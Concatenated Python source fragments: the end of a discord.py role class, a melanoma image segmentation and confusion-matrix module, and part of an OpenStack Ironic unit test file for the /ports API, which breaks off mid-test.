data = yield from self._state.http.edit_role(self.guild.id, self.id, reason=reason, **payload)
self._update(data)
@asyncio.coroutine
def delete(self, *, reason=None):
"""|coro|
Deletes the role.
You must have the :attr:`Permissions.manage_roles` permission to
use this.
Parameters
-----------
reason: Optional[str]
The reason for deleting this role. Shows up on the audit log.
Raises
--------
Forbidden
You do not have permissions to delete the role.
HTTPException
Deleting the role failed.
"""
yield from self._state.http.delete_role(self.guild.id, self.id, reason=reason)
| |
from util.image import Image
from scipy.misc import imread
import numpy as np
import config as cfg
import time
"""
Implements methods to classify images
"""
def classify(melanoma, ground, feature, classifier, block=True):
seg = []
tim = []
dim = []
for (melanoma_item, ground_item) in zip(melanoma, ground):
print('Segmentating...')
print('\t'+melanoma_item)
img = Image(cfg.melanoma_path + melanoma_item, cfg.ground_path + ground_item, cfg.block)
size = img.get_shape()
portion = img.get_portion()
dim.append(size)
img_seg = np.zeros((size[0], size[1]))
row = [portion, size[0] - portion]
col = [portion, size[1] - portion]
if block:
st = time.time()
seg.append(per_block(img, img_seg, row, col, feature, classifier))
tim.append(time.time() - st)
else:
st = time.time()
seg.append(per_pixel(img, img_seg, row, col, feature, classifier))
tim.append(time.time() - st)
return seg, tim, dim
def per_block(img, img_seg, row, col, feature, classifier):
ratio = 4
adv = 2 * ratio + 1
for r in range(row[0], row[1], adv):
for c in range(col[0], col[1], adv):
blk = img.get_block([r, c])
val = feature.features(blk)
pre = classifier.predict([val])
img_seg[r: r + adv, c: c + adv] = pre
return img_seg
def per_pixel(img, img_seg, row, col, feature, classifier):
for r in range(row[0], row[1]):
for c in range(col[0], col[1]):
blk = img.get_block([r, c])
val = feature.features(blk)
pre = classifier.predict([val])
img_seg[r, c] = pre
return img_seg
def local_error(confmat):
"""
Calculates the accuracy by each image
Parameters
----------
confmat: list of lists
The confusion matrix to calculate the accuracy, TP, FP, FN, TN
Returns
-------
A list of list with 3 values (Sensitivity, Specificity, Accuracy)
"""
local_err = []
for mat in confmat:
TP = mat[0]
FP = mat[1]
FN = mat[2]
TN = mat[3]
sensitivity = TP / (TP + FN)
specificity = TN / (TN + FP)
accuracy = (TP + TN) / (TP + FP + TN + FN)
local_err.append([sensitivity, specificity, accuracy])
return local_err
def total_error(local_acc):
"""
Calculates the mean accuracy of a list of local accuracys
Parameters
----------
local_acc: list of lists
The local accuracy of each image
Returns
-------
3 values, (Sensitivity, Specificity, Accuracy)
"""
acc = np.array(local_acc)
sensitivity_mean = acc[:, 0].mean()
sensitivity_std = acc[:, 0].std()
specificity_mean = acc[:, 1].mean()
specificity_std = acc[:, 1].std()
accuracy_mean = acc[:, 2].mean()
accuracy_std = acc[:, 2].std()
return [sensitivity_mean, sensitivity_std], [specificity_mean, specificity_std], [accuracy_mean, accuracy_std]
def estimate_error(confmat):
"""
Calculates the accuracy from a confusion matrix.
Parameters
----------
confmat: list of lists
The confusion matrix to calculate the accuracy
Returns
-------
3 values, (Sensitivity, Specificity, Accuracy)
"""
cm = np.array(confmat)
TP = cm[:, 0].sum()
FP = cm[:, 1].sum()
FN = cm[:, 2].sum()
TN = cm[:, 3].sum()
sensitivity = TP / (TP + FN)
specificity = TN / (TN + FP)
accuracy = (TP + TN) / (TP + FP + TN + FN)
return sensitivity, specificity, accuracy
def confusion_matrix(seg, ground_list):
"""
Calculates the confusion matrix
Parameters
----------
seg: list
A list with the segmented images. Each item of the list is a 2D-array
ground_list: list
A list with all the ground_truth path of the segmented images.
Returns
-------
A list of 1D-array. Each sublist contents the values TP, FP, FN, TN of a confusion matrix.
"""
from skimage import io
acc = []
for s, g in zip(seg, ground_list):
ground = imread(cfg.ground_path + g)
m1 = ground.astype(int)
m2 = s.astype(int)
conf = np.zeros((4,), dtype=int) # TP, FP, FN, TN
for row in range(m1.shape[0]):
for col in range(m1.shape[1]):
val1 = m1[row][col]
val2 = m2[row][col]
if val1 == val2:
if val1 == 255:
conf[0] += 1
elif val1 == 0:
conf[3] += 1
elif val1 > val2:
conf[2] += 1
else:
conf[1] += 1
acc.append(conf)
return acc
"""
# Calculate the accuracy and save the segmentation image
def accurate_and_segmentation(self, data_set, ground_set, set=None, string=None):
size = len(data_set)
acc = np.zeros((size, 4), dtype=int)
data_path = None
ground_path = None
if set is not None:
if set == 'test':
data_path = cfg.test_data_path
ground_path = cfg.test_ground_path
elif set == 'train':
data_path = cfg.train_data_path
ground_path = cfg.train_ground_path
cont = 0
for (data, ground) in zip(data_set, ground_set):
c = self.classify_advanced(data_path + data, block=True)
g = read_image(ground_path + ground)
self.save_segmentation(data, c, string)
acc[cont, :] = self.compare_ground_truth(g, c)
cont += 1
return acc
else:
print('Expected a set value. Posible values: train or test')
raise AttributeError
# Classify and calculates the mse between the image classified and the ground image
def accurate(self, data_set, ground_set, set=None):
acc = np.zeros((15, 4), dtype=int)
data_path = None
ground_path = None
if set is not None:
if set == 'test':
data_path = cfg.test_data_path
ground_path = cfg.test_ground_path
elif set == 'train':
data_path = cfg.train_data_path
ground_path = cfg.train_ground_path
cont = 0
for (data, ground) in zip(data_set, ground_set):
c = self.classify_RGB(data_path + data, block=False)
g = read_image(ground_path + ground)
#self.save_accurate(data, c)
self.save_segmentation(data, c, '')
acc[cont, :] = self.compare_ground_truth(g, c)
cont += 1
return acc
else:
print('Expected a set value. Posible values: train or test')
raise AttributeError
# Classify a data set
def classify_RGB(self, data, block=None):
image = Image(data, 'None', cfg.blockDim)
original_size = image.get_original_size()
image_classified = np.zeros((original_size[0], original_size[1]))
start_row = cfg.blockDim
end_row = image.image.shape[0] - cfg.blockDim
start_col = cfg.blockDim
end_col = image.image.shape[1] - cfg.blockDim
if (block is None) or (block):
ratio = 4 # block dimension is (9x9)
start_row += ratio
end_row -= ratio
start_col += ratio
end_col -= ratio
for row in range(start_row, end_row, ratio + 1):
for col in range(start_col, end_col, ratio + 1):
blk = image.get_block([row, col]) # 25x25 get the block 25x25 from the central pixel
rgb = self.feature.mean_rgb(blk) # [mean r, mean g, mean b] calculate means
gab = self.feature.gabor_filter(blk) # [gab 0, gab 1, gab 2, gab 3] calculate mean convolve gabor filters
set = [*rgb, *gab]
pred = self.learning.predict([set])
image_classified[row - cfg.blockDim: row - cfg.blockDim + (ratio * 2) + 1,
col - cfg.blockDim: col - cfg.blockDim + (ratio * 2) + 1] = pred
return image_classified
else:
print("Classifying pixel per pixel")
for row in range(start_row, end_row):
for col in range(start_col, end_col):
blk = image.get_block([row, col]) # 25x25 get the block 25x25 from the central pixel
rgb = self.feature.mean_rgb(blk) # [mean r, mean g, mean b] calculate means
gab = self.feature.gabor_filter(blk) # [gab 0, gab 1, gab 2, gab 3] calculate mean convolve gabor filters
set = [*rgb, *gab]
image_classified[row - cfg.blockDim, col - cfg.blockDim] = self.learning.predict([set])
return image_classified
def classify_advanced(self, data, block=None):
image = Image(data, 'None', cfg.blockDim)
ground = get_segmentation(data)
self.feature.set_theta(ground, False)
self.feature.set_kernel()
original_size = image.get_original_size()
image_classified = np.zeros((original_size[0], original_size[1]))
start_row = cfg.blockDim
end_row = image.image.shape[0] - cfg.blockDim
start_col = cfg.blockDim
end_col = image.image.shape[1] - cfg.blockDim
if (block is None) or (block):
ratio = 4 # block dimension is (9x9)
start_row += ratio
end_row -= ratio
start_col += ratio
end_col -= ratio
for row in range(start_row, end_row, ratio + 1):
for col in range(start_col, end_col, ratio + 1):
blk = image.get_block([row, col]) # 25x25 get the block 25x25 from the central pixel
mm = self.feature.max_min(blk)
hsv = self.feature.mean_hsv(blk)
rgb = self.feature.mean_rgb(blk)
std = self.feature.standar_deviation(blk)
gab = self.feature.gabor_filter(blk)
set = [*mm, *hsv, *rgb, *std, gab]
pred = self.learning.predict([set])
image_classified[row - cfg.blockDim: row - cfg.blockDim + (ratio * 2) + 1,
col - cfg.blockDim: col - cfg.blockDim + (ratio * 2) + 1] = pred
return image_classified
else:
for row in range(start_row, end_row):
for col in range(start_col, end_col):
blk = image.get_block([row, col]) # 25x25 get the block 25x25 from the central pixel
mm = self.feature.max_min(blk)
hsv = self.feature.mean_hsv(blk)
rgb = self.feature.mean_rgb(blk)
std = self.feature.standar_deviation(blk)
gab = self.feature.gabor_filter(blk)
set = [*mm, *hsv, *rgb, *std, gab]
image_classified[row - cfg.blockDim, col - cfg.blockDim] = self.learning.predict([set])
return image_classified
# m1 es la imagen original, y m2 es la segmentada
# Print accurate
def save_accurate(self, data, c):
print("Saving image")
path = "/home/mrobot/Documentos/TFG/code/imagenes/test/"
file, ext = str.split(data, '.')
nI = str(cfg.nImage)
nS = str(cfg.nSample)
io.imsave(path + file + "_" + nI + "_" + nS + ".png", c)
# save segmentation
def save_segmentation(self, data, c, string):
print("Saving segmentation")
path = "/home/mrobot/Documentos/TFG/code/imagenes/unity_test/"
file, ext = str.split(data, '.')
io.imsave(path + file + "_" + string + ".png", c)
# Calculates the mean-square error between two images
def mean_squared_error(self, im1, im2):
from skimage.measure import compare_mse
return compare_mse(im1, im2)
"""
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests for the API /ports/ methods.
"""
import datetime
import mock
from oslo_config import cfg
from oslo_utils import timeutils
from oslo_utils import uuidutils
import six
from six.moves import http_client
from six.moves.urllib import parse as urlparse
from testtools import matchers
from wsme import types as wtypes
from ironic.api.controllers import base as api_base
from ironic.api.controllers import v1 as api_v1
from ironic.api.controllers.v1 import notification_utils
from ironic.api.controllers.v1 import port as api_port
from ironic.api.controllers.v1 import utils as api_utils
from ironic.api.controllers.v1 import versions
from ironic.common import exception
from ironic.common import utils as common_utils
from ironic.conductor import rpcapi
from ironic import objects
from ironic.objects import fields as obj_fields
from ironic.tests import base
from ironic.tests.unit.api import base as test_api_base
from ironic.tests.unit.api import utils as apiutils
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.objects import utils as obj_utils
# NOTE(lucasagomes): When creating a port via API (POST)
# we have to use node_uuid and portgroup_uuid
def post_get_test_port(**kw):
port = apiutils.port_post_data(**kw)
node = db_utils.get_test_node()
portgroup = db_utils.get_test_portgroup()
port['node_uuid'] = kw.get('node_uuid', node['uuid'])
port['portgroup_uuid'] = kw.get('portgroup_uuid', portgroup['uuid'])
return port
def _rpcapi_create_port(self, context, port, topic):
"""Fake used to mock out the conductor RPCAPI's create_port method.
Performs creation of the port object and returns the created port as-per
the real method.
"""
port.create()
return port
def _rpcapi_update_port(self, context, port, topic):
"""Fake used to mock out the conductor RPCAPI's update_port method.
Saves the updated port object and returns the updated port as-per the real
method.
"""
port.save()
return port
class TestPortObject(base.TestCase):
@mock.patch("pecan.request")
def test_port_init(self, mock_pecan_req):
mock_pecan_req.version.minor = 1
port_dict = apiutils.port_post_data(node_id=None,
portgroup_uuid=None)
del port_dict['extra']
port = api_port.Port(**port_dict)
self.assertEqual(wtypes.Unset, port.extra)
@mock.patch.object(api_utils, 'allow_port_physical_network', autospec=True)
@mock.patch.object(api_utils, 'allow_portgroups_subcontrollers', autospec=True)
@mock.patch.object(api_utils, 'allow_port_advanced_net_fields', autospec=True)
class TestPortsController__CheckAllowedPortFields(base.TestCase):
def setUp(self):
super(TestPortsController__CheckAllowedPortFields, self).setUp()
self.controller = api_port.PortsController()
def test__check_allowed_port_fields_none(self, mock_allow_port,
mock_allow_portgroup,
mock_allow_physnet):
self.assertIsNone(
self.controller._check_allowed_port_fields(None))
self.assertFalse(mock_allow_port.called)
self.assertFalse(mock_allow_portgroup.called)
self.assertFalse(mock_allow_physnet.called)
def test__check_allowed_port_fields_empty(self, mock_allow_port,
mock_allow_portgroup,
mock_allow_physnet):
for v in (True, False):
mock_allow_port.return_value = v
self.assertIsNone(
self.controller._check_allowed_port_fields([]))
mock_allow_port.assert_called_once_with()
mock_allow_port.reset_mock()
self.assertFalse(mock_allow_portgroup.called)
self.assertFalse(mock_allow_physnet.called)
def test__check_allowed_port_fields_not_allow(self, mock_allow_port,
mock_allow_portgroup,
mock_allow_physnet):
mock_allow_port.return_value = False
for field in api_port.PortsController.advanced_net_fields:
self.assertRaises(exception.NotAcceptable,
self.controller._check_allowed_port_fields,
[field])
mock_allow_port.assert_called_once_with()
mock_allow_port.reset_mock()
self.assertFalse(mock_allow_portgroup.called)
self.assertFalse(mock_allow_physnet.called)
def test__check_allowed_port_fields_allow(self, mock_allow_port,
mock_allow_portgroup,
mock_allow_physnet):
mock_allow_port.return_value = True
for field in api_port.PortsController.advanced_net_fields:
self.assertIsNone(
self.controller._check_allowed_port_fields([field]))
mock_allow_port.assert_called_once_with()
mock_allow_port.reset_mock()
self.assertFalse(mock_allow_portgroup.called)
self.assertFalse(mock_allow_physnet.called)
def test__check_allowed_port_fields_portgroup_not_allow(
self, mock_allow_port, mock_allow_portgroup, mock_allow_physnet):
mock_allow_port.return_value = True
mock_allow_portgroup.return_value = False
self.assertRaises(exception.NotAcceptable,
self.controller._check_allowed_port_fields,
['portgroup_uuid'])
mock_allow_port.assert_called_once_with()
mock_allow_portgroup.assert_called_once_with()
self.assertFalse(mock_allow_physnet.called)
def test__check_allowed_port_fields_portgroup_allow(
self, mock_allow_port, mock_allow_portgroup, mock_allow_physnet):
mock_allow_port.return_value = True
mock_allow_portgroup.return_value = True
self.assertIsNone(
self.controller._check_allowed_port_fields(['portgroup_uuid']))
mock_allow_port.assert_called_once_with()
mock_allow_portgroup.assert_called_once_with()
self.assertFalse(mock_allow_physnet.called)
def test__check_allowed_port_fields_physnet_not_allow(
self, mock_allow_port, mock_allow_portgroup, mock_allow_physnet):
mock_allow_port.return_value = True
mock_allow_physnet.return_value = False
self.assertRaises(exception.NotAcceptable,
self.controller._check_allowed_port_fields,
['physical_network'])
mock_allow_port.assert_called_once_with()
self.assertFalse(mock_allow_portgroup.called)
mock_allow_physnet.assert_called_once_with()
def test__check_allowed_port_fields_physnet_allow(
self, mock_allow_port, mock_allow_portgroup, mock_allow_physnet):
mock_allow_port.return_value = True
mock_allow_physnet.return_value = True
self.assertIsNone(
self.controller._check_allowed_port_fields(['physical_network']))
mock_allow_port.assert_called_once_with()
self.assertFalse(mock_allow_portgroup.called)
mock_allow_physnet.assert_called_once_with()
class TestListPorts(test_api_base.BaseApiTest):
def setUp(self):
super(TestListPorts, self).setUp()
self.node = obj_utils.create_test_node(self.context)
def test_empty(self):
data = self.get_json('/ports')
self.assertEqual([], data['ports'])
def test_one(self):
port = obj_utils.create_test_port(self.context, node_id=self.node.id)
data = self.get_json('/ports')
self.assertEqual(port.uuid, data['ports'][0]["uuid"])
self.assertNotIn('extra', data['ports'][0])
self.assertNotIn('node_uuid', data['ports'][0])
# never expose the node_id
self.assertNotIn('node_id', data['ports'][0])
def test_get_one(self):
port = obj_utils.create_test_port(self.context, node_id=self.node.id)
data = self.get_json('/ports/%s' % port.uuid)
self.assertEqual(port.uuid, data['uuid'])
self.assertIn('extra', data)
self.assertIn('node_uuid', data)
# never expose the node_id, port_id, portgroup_id
self.assertNotIn('node_id', data)
self.assertNotIn('port_id', data)
self.assertNotIn('portgroup_id', data)
self.assertNotIn('portgroup_uuid', data)
def test_get_one_portgroup_is_none(self):
port = obj_utils.create_test_port(self.context, node_id=self.node.id)
data = self.get_json('/ports/%s' % port.uuid,
headers={api_base.Version.string: '1.24'})
self.assertEqual(port.uuid, data['uuid'])
self.assertIn('extra', data)
self.assertIn('node_uuid', data)
# never expose the node_id, port_id, portgroup_id
self.assertNotIn('node_id', data)
self.assertNotIn('port_id', data)
self.assertNotIn('portgroup_id', data)
self.assertIn('portgroup_uuid', data)
def test_get_one_custom_fields(self):
port = obj_utils.create_test_port(self.context, node_id=self.node.id)
fields = 'address,extra'
data = self.get_json(
'/ports/%s?fields=%s' % (port.uuid, fields),
headers={api_base.Version.string: str(api_v1.MAX_VER)})
# We always append "links"
self.assertItemsEqual(['address', 'extra', 'links'], data)
def test_hide_fields_in_newer_versions_internal_info(self):
port = obj_utils.create_test_port(self.context, node_id=self.node.id,
internal_info={"foo": "bar"})
data = self.get_json(
'/ports/%s' % port.uuid,
headers={api_base.Version.string: str(api_v1.MIN_VER)})
self.assertNotIn('internal_info', data)
data = self.get_json('/ports/%s' % port.uuid,
headers={api_base.Version.string: "1.18"})
self.assertEqual({"foo": "bar"}, data['internal_info'])
def test_hide_fields_in_newer_versions_advanced_net(self):
llc = {'switch_info': 'switch', 'switch_id': 'aa:bb:cc:dd:ee:ff',
'port_id': 'Gig0/1'}
port = obj_utils.create_test_port(self.context, node_id=self.node.id,
pxe_enabled=True,
local_link_connection=llc)
data = self.get_json(
'/ports/%s' % port.uuid,
headers={api_base.Version.string: "1.18"})
self.assertNotIn('pxe_enabled', data)
self.assertNotIn('local_link_connection', data)
data = self.get_json('/ports/%s' % port.uuid,
headers={api_base.Version.string: "1.19"})
self.assertTrue(data['pxe_enabled'])
self.assertEqual(llc, data['local_link_connection'])
def test_hide_fields_in_newer_versions_portgroup_uuid(self):
portgroup = obj_utils.create_test_portgroup(self.context,
node_id=self.node.id)
port = obj_utils.create_test_port(self.context, node_id=self.node.id,
portgroup_id=portgroup.id)
data = self.get_json(
'/ports/%s' % port.uuid,
headers={api_base.Version.string: "1.23"})
self.assertNotIn('portgroup_uuid', data)
data = self.get_json('/ports/%s' % port.uuid,
headers={api_base.Version.string: "1.24"})
self.assertEqual(portgroup.uuid, data['portgroup_uuid'])
def test_hide_fields_in_newer_versions_physical_network(self):
port = obj_utils.create_test_port(self.context, node_id=self.node.id,
physical_network='physnet1')
data = self.get_json(
'/ports/%s' % port.uuid,
headers={api_base.Version.string: "1.33"})
self.assertNotIn('physical_network', data)
data = self.get_json('/ports/%s' % port.uuid,
headers={api_base.Version.string: "1.34"})
self.assertEqual("physnet1", data['physical_network'])
@mock.patch.object(objects.Port, 'supports_physical_network')
def test_hide_fields_in_newer_versions_physical_network_upgrade(self,
mock_spn):
mock_spn.return_value = False
port = obj_utils.create_test_port(self.context, node_id=self.node.id,
physical_network='physnet1')
data = self.get_json(
'/ports/%s' % port.uuid,
headers={api_base.Version.string: "1.34"})
self.assertNotIn('physical_network', data)
def test_get_collection_custom_fields(self):
fields = 'uuid,extra'
for i in range(3):
obj_utils.create_test_port(self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
address='52:54:00:cf:2d:3%s' % i)
data = self.get_json(
'/ports?fields=%s' % fields,
headers={api_base.Version.string: str(api_v1.MAX_VER)})
self.assertEqual(3, len(data['ports']))
for port in data['ports']:
# We always append "links"
self.assertItemsEqual(['uuid', 'extra', 'links'], port)
def test_get_custom_fields_invalid_fields(self):
port = obj_utils.create_test_port(self.context, node_id=self.node.id)
fields = 'uuid,spongebob'
response = self.get_json(
'/ports/%s?fields=%s' % (port.uuid, fields),
headers={api_base.Version.string: str(api_v1.MAX_VER)},
expect_errors=True)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn('spongebob', response.json['error_message'])
def test_get_custom_fields_invalid_api_version(self):
port = obj_utils.create_test_port(self.context, node_id=self.node.id)
fields = 'uuid,extra'
response = self.get_json(
'/ports/%s?fields=%s' % (port.uuid, fields),
headers={api_base.Version.string: str(api_v1.MIN_VER)},
expect_errors=True)
self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
def test_get_custom_fields_physical_network(self):
port = obj_utils.create_test_port(self.context, node_id=self.node.id,
physical_network='physnet1')
fields = 'uuid,physical_network'
response = self.get_json(
'/ports/%s?fields=%s' % (port.uuid, fields),
headers={api_base.Version.string: "1.33"},
expect_errors=True)
self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
response = self.get_json(
'/ports/%s?fields=%s' % (port.uuid, fields),
headers={api_base.Version.string: "1.34"})
# We always append "links".
self.assertItemsEqual(['uuid', 'physical_network', 'links'], response)
@mock.patch.object(objects.Port, 'supports_physical_network')
def test_get_custom_fields_physical_network_upgrade(self, mock_spn):
mock_spn.return_value = False
port = obj_utils.create_test_port(self.context, node_id=self.node.id,
physical_network='physnet1')
fields = 'uuid,physical_network'
response = self.get_json(
'/ports/%s?fields=%s' % (port.uuid, fields),
headers={api_base.Version.string: "1.34"},
expect_errors=True)
self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
def test_detail(self):
llc = {'switch_info': 'switch', 'switch_id': 'aa:bb:cc:dd:ee:ff',
'port_id': 'Gig0/1'}
portgroup = obj_utils.create_test_portgroup(self.context,
node_id=self.node.id)
port = obj_utils.create_test_port(self.context, node_id=self.node.id,
portgroup_id=portgroup.id,
pxe_enabled=False,
local_link_connection=llc,
physical_network='physnet1')
data = self.get_json(
'/ports/detail',
headers={api_base.Version.string: str(api_v1.MAX_VER)}
)
self.assertEqual(port.uuid, data['ports'][0]["uuid"])
self.assertIn('extra', data['ports'][0])
self.assertIn('internal_info', data['ports'][0])
self.assertIn('node_uuid', data['ports'][0])
self.assertIn('pxe_enabled', data['ports'][0])
self.assertIn('local_link_connection', data['ports'][0])
self.assertIn('portgroup_uuid', data['ports'][0])
self.assertIn('physical_network', data['ports'][0])
# never expose the node_id and portgroup_id
self.assertNotIn('node_id', data['ports'][0])
self.assertNotIn('portgroup_id', data['ports'][0])
def test_detail_against_single(self):
port = obj_utils.create_test_port(self.context, node_id=self.node.id)
response = self.get_json('/ports/%s/detail' % port.uuid,
expect_errors=True)
self.assertEqual(http_client.NOT_FOUND, response.status_int)
def test_many(self):
ports = []
for id_ in range(5):
port = obj_utils.create_test_port(
self.context, node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
address='52:54:00:cf:2d:3%s' % id_)
ports.append(port.uuid)
data = self.get_json('/ports')
self.assertEqual(len(ports), len(data['ports']))
uuids = [n['uuid'] for n in data['ports']]
six.assertCountEqual(self, ports, uuids)
def _test_links(self, public_url=None):
cfg.CONF.set_override('public_endpoint', public_url, 'api')
uuid = uuidutils.generate_uuid()
obj_utils.create_test_port(self.context,
uuid=uuid,
node_id=self.node.id)
data = self.get_json('/ports/%s' % uuid)
self.assertIn('links', data.keys())
self.assertEqual(2, len(data['links']))
self.assertIn(uuid, data['links'][0]['href'])
for l in data['links']:
bookmark = l['rel'] == 'bookmark'
self.assertTrue(self.validate_link(l['href'], bookmark=bookmark))
if public_url is not None:
expected = [{'href': '%s/v1/ports/%s' % (public_url, uuid),
'rel': 'self'},
{'href': '%s/ports/%s' % (public_url, uuid),
'rel': 'bookmark'}]
for i in expected:
self.assertIn(i, data['links'])
def test_links(self):
self._test_links()
def test_links_public_url(self):
self._test_links(public_url='http://foo')
def test_collection_links(self):
ports = []
for id_ in range(5):
port = obj_utils.create_test_port(
self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
address='52:54:00:cf:2d:3%s' % id_)
ports.append(port.uuid)
data = self.get_json('/ports/?limit=3')
self.assertEqual(3, len(data['ports']))
next_marker = data['ports'][-1]['uuid']
self.assertIn(next_marker, data['next'])
def test_collection_links_default_limit(self):
cfg.CONF.set_override('max_limit', 3, 'api')
ports = []
for id_ in range(5):
port = obj_utils.create_test_port(
self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
address='52:54:00:cf:2d:3%s' % id_)
ports.append(port.uuid)
data = self.get_json('/ports')
self.assertEqual(3, len(data['ports']))
next_marker = data['ports'][-1]['uuid']
self.assertIn(next_marker, data['next'])
def test_port_by_address(self):
address_template = "aa:bb:cc:dd:ee:f%d"
for id_ in range(3):
obj_utils.create_test_port(self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
address=address_template % id_)
target_address = address_template % 1
data = self.get_json('/ports?address=%s' % target_address)
self.assertThat(data['ports'], matchers.HasLength(1))
self.assertEqual(target_address, data['ports'][0]['address'])
def test_port_by_address_non_existent_address(self):
# non-existent address
data = self.get_json('/ports?address=%s' % 'aa:bb:cc:dd:ee:ff')
self.assertThat(data['ports'], matchers.HasLength(0))
def test_port_by_address_invalid_address_format(self):
obj_utils.create_test_port(self.context, node_id=self.node.id)
invalid_address = 'invalid-mac-format'
response = self.get_json('/ports?address=%s' % invalid_address,
expect_errors=True)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn(invalid_address, response.json['error_message'])
def test_sort_key(self):
ports = []
for id_ in range(3):
port = obj_utils.create_test_port(
self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
address='52:54:00:cf:2d:3%s' % id_)
ports.append(port.uuid)
data = self.get_json('/ports?sort_key=uuid')
uuids = [n['uuid'] for n in data['ports']]
self.assertEqual(sorted(ports), uuids)
def test_sort_key_invalid(self):
invalid_keys_list = ['foo', 'extra', 'internal_info',
'local_link_connection']
for invalid_key in invalid_keys_list:
response = self.get_json(
'/ports?sort_key=%s' % invalid_key, expect_errors=True,
headers={api_base.Version.string: str(api_v1.MAX_VER)}
)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn(invalid_key, response.json['error_message'])
def _test_sort_key_allowed(self, detail=False):
port_uuids = []
for id_ in range(2):
port = obj_utils.create_test_port(
self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
address='52:54:00:cf:2d:3%s' % id_,
pxe_enabled=id_ % 2)
port_uuids.append(port.uuid)
headers = {api_base.Version.string: str(api_v1.MAX_VER)}
detail_str = '/detail' if detail else ''
data = self.get_json('/ports%s?sort_key=pxe_enabled' % detail_str,
headers=headers)
data_uuids = [p['uuid'] for p in data['ports']]
self.assertEqual(port_uuids, data_uuids)
def test_sort_key_allowed(self):
self._test_sort_key_allowed()
def test_detail_sort_key_allowed(self):
self._test_sort_key_allowed(detail=True)
def _test_sort_key_not_allowed(self, detail=False):
headers = {api_base.Version.string: '1.18'}
detail_str = '/detail' if detail else ''
resp = self.get_json('/ports%s?sort_key=pxe_enabled' % detail_str,
headers=headers, expect_errors=True)
self.assertEqual(http_client.NOT_ACCEPTABLE, resp.status_int)
self.assertEqual('application/json', resp.content_type)
def test_sort_key_not_allowed(self):
self._test_sort_key_not_allowed()
def test_detail_sort_key_not_allowed(self):
self._test_sort_key_not_allowed(detail=True)
@mock.patch.object(api_utils, 'get_rpc_node')
def test_get_all_by_node_name_ok(self, mock_get_rpc_node):
# GET /v1/ports specifying node_name - success
mock_get_rpc_node.return_value = self.node
for i in range(5):
if i < 3:
node_id = self.node.id
else:
node_id = 100000 + i
obj_utils.create_test_port(self.context,
node_id=node_id,
uuid=uuidutils.generate_uuid(),
address='52:54:00:cf:2d:3%s' % i)
data = self.get_json("/ports?node=%s" % 'test-node',
headers={api_base.Version.string: '1.5'})
self.assertEqual(3, len(data['ports']))
@mock.patch.object(api_utils, 'get_rpc_node')
def test_get_all_by_node_uuid_and_name(self, mock_get_rpc_node):
# GET /v1/ports specifying node and uuid - should only use node_uuid
mock_get_rpc_node.return_value = self.node
obj_utils.create_test_port(self.context, node_id=self.node.id)
self.get_json('/ports/detail?node_uuid=%s&node=%s' %
(self.node.uuid, 'node-name'))
mock_get_rpc_node.assert_called_once_with(self.node.uuid)
@mock.patch.object(api_utils, 'get_rpc_node')
def test_get_all_by_node_name_not_supported(self, mock_get_rpc_node):
# GET /v1/ports specifying node_name - name not supported
mock_get_rpc_node.side_effect = (
exception.InvalidUuidOrName(name=self.node.uuid))
for i in range(3):
obj_utils.create_test_port(self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
address='52:54:00:cf:2d:3%s' % i)
data = self.get_json("/ports?node=%s" % 'test-node',
expect_errors=True)
self.assertEqual(0, mock_get_rpc_node.call_count)
self.assertEqual(http_client.NOT_ACCEPTABLE, data.status_int)
@mock.patch.object(api_utils, 'get_rpc_node')
def test_detail_by_node_name_ok(self, mock_get_rpc_node):
# GET /v1/ports/detail specifying node_name - success
mock_get_rpc_node.return_value = self.node
port = obj_utils.create_test_port(self.context, node_id=self.node.id)
data = self.get_json('/ports/detail?node=%s' % 'test-node',
headers={api_base.Version.string: '1.5'})
self.assertEqual(port.uuid, data['ports'][0]['uuid'])
self.assertEqual(self.node.uuid, data['ports'][0]['node_uuid'])
@mock.patch.object(api_utils, 'get_rpc_node')
def test_detail_by_node_name_not_supported(self, mock_get_rpc_node):
# GET /v1/ports/detail specifying node_name - name not supported
mock_get_rpc_node.side_effect = (
exception.InvalidUuidOrName(name=self.node.uuid))
obj_utils.create_test_port(self.context, node_id=self.node.id)
data = self.get_json('/ports/detail?node=%s' % 'test-node',
expect_errors=True)
self.assertEqual(0, mock_get_rpc_node.call_count)
self.assertEqual(http_client.NOT_ACCEPTABLE, data.status_int)
def test_get_all_by_portgroup_uuid(self):
pg = obj_utils.create_test_portgroup(self.context,
node_id=self.node.id)
port = obj_utils.create_test_port(self.context, node_id=self.node.id,
portgroup_id=pg.id)
data = self.get_json('/ports/detail?portgroup=%s' % pg.uuid,
headers={api_base.Version.string: '1.24'})
self.assertEqual(port.uuid, data['ports'][0]['uuid'])
self.assertEqual(pg.uuid,
data['ports'][0]['portgroup_uuid'])
def test_get_all_by_portgroup_uuid_older_api_version(self):
pg = obj_utils.create_test_portgroup(self.context,
node_id=self.node.id)
response = self.get_json(
'/ports/detail?portgroup=%s' % pg.uuid,
headers={api_base.Version.string: '1.14'},
expect_errors=True
)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
def test_get_all_by_portgroup_name(self):
pg = obj_utils.create_test_portgroup(self.context,
node_id=self.node.id)
port = obj_utils.create_test_port(self.context, node_id=self.node.id,
